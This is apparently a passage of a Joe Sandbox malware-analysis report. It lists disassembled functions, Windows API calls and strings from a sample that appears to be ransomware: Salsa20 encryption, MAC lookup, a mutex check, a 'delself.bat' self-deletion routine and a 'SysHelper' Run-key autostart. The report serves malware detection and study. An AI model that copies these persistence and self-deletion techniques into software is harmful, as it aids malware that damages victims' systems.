CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(006E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 473631332-1604013687
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON

Download Yara Rule

APIs

PathAppendW.SHLWAPI(?,?), ref: 0040FBD5
_memmove.LIBCMT ref: 0040FC3C
PathFileExistsW.SHLWAPI(?,?,?,?), ref: 0040FC63
_malloc.LIBCMT ref: 0040FC72
lstrcpyW.KERNEL32(00000000,?), ref: 0040FC8C
lstrcatW.KERNEL32(00000000,?), ref: 0040FCA5
_free.LIBCMT ref: 0040FCD7

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
String ID:
API String ID: 3232302685-0
Opcode ID: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
Opcode Fuzzy Hash: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

input != nullptr && output != nullptr, xrefs: 0040C095
e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 00411190
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528

Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928

Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29

Function 004278D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
" goto try, xrefs: 00412666
"if exist ", xrefs: 00412648
D, xrefs: 00412720
@echo off:trydel ", xrefs: 0041262A
delself.bat, xrefs: 0041261C
TEMP, xrefs: 004125DF
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
del ", xrefs: 00412674

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

-----BEGIN , xrefs: 004636A4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21
, xrefs: 00463A90
-----END , xrefs: 0046382F, 00463940, 004639E4

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Function 004270A5 Relevance: 18.3, APIs: 12, Instructions: 289COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0042708B
DecodePointer.KERNEL32(?,?,?,?,000000FF,?,?,00463083,?,00000000,00000000), ref: 004271FE
DecodePointer.KERNEL32(?,?), ref: 0042722A
DecodePointer.KERNEL32(?,?), ref: 0042724F
__aulldvrm.LIBCMT ref: 00427385
_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_string.LIBCMT ref: 0042756B
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
String ID:
API String ID: 559064418-0
Opcode ID: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
Instruction ID: 14f77054e820437d32f524f0a61f308f331f5c30c1a6e174fa9440fd564cd740
Opcode Fuzzy Hash: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
Instruction Fuzzy Hash: B8B1A171E092399FDF209B54EC88BAAB7B5EF54314F5400DAD908A6251D7389E80CF59

Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00427B29
_free.LIBCMT ref: 00427B42

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

_free.LIBCMT ref: 00427B55
_free.LIBCMT ref: 00427B73
_free.LIBCMT ref: 00427B85
_free.LIBCMT ref: 00427B96
_free.LIBCMT ref: 00427BA1
_free.LIBCMT ref: 00427BC5
EncodePointer.KERNEL32(006E5610), ref: 00427BCC
_free.LIBCMT ref: 00427BE1
_free.LIBCMT ref: 00427BF7
_free.LIBCMT ref: 00427C1F

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

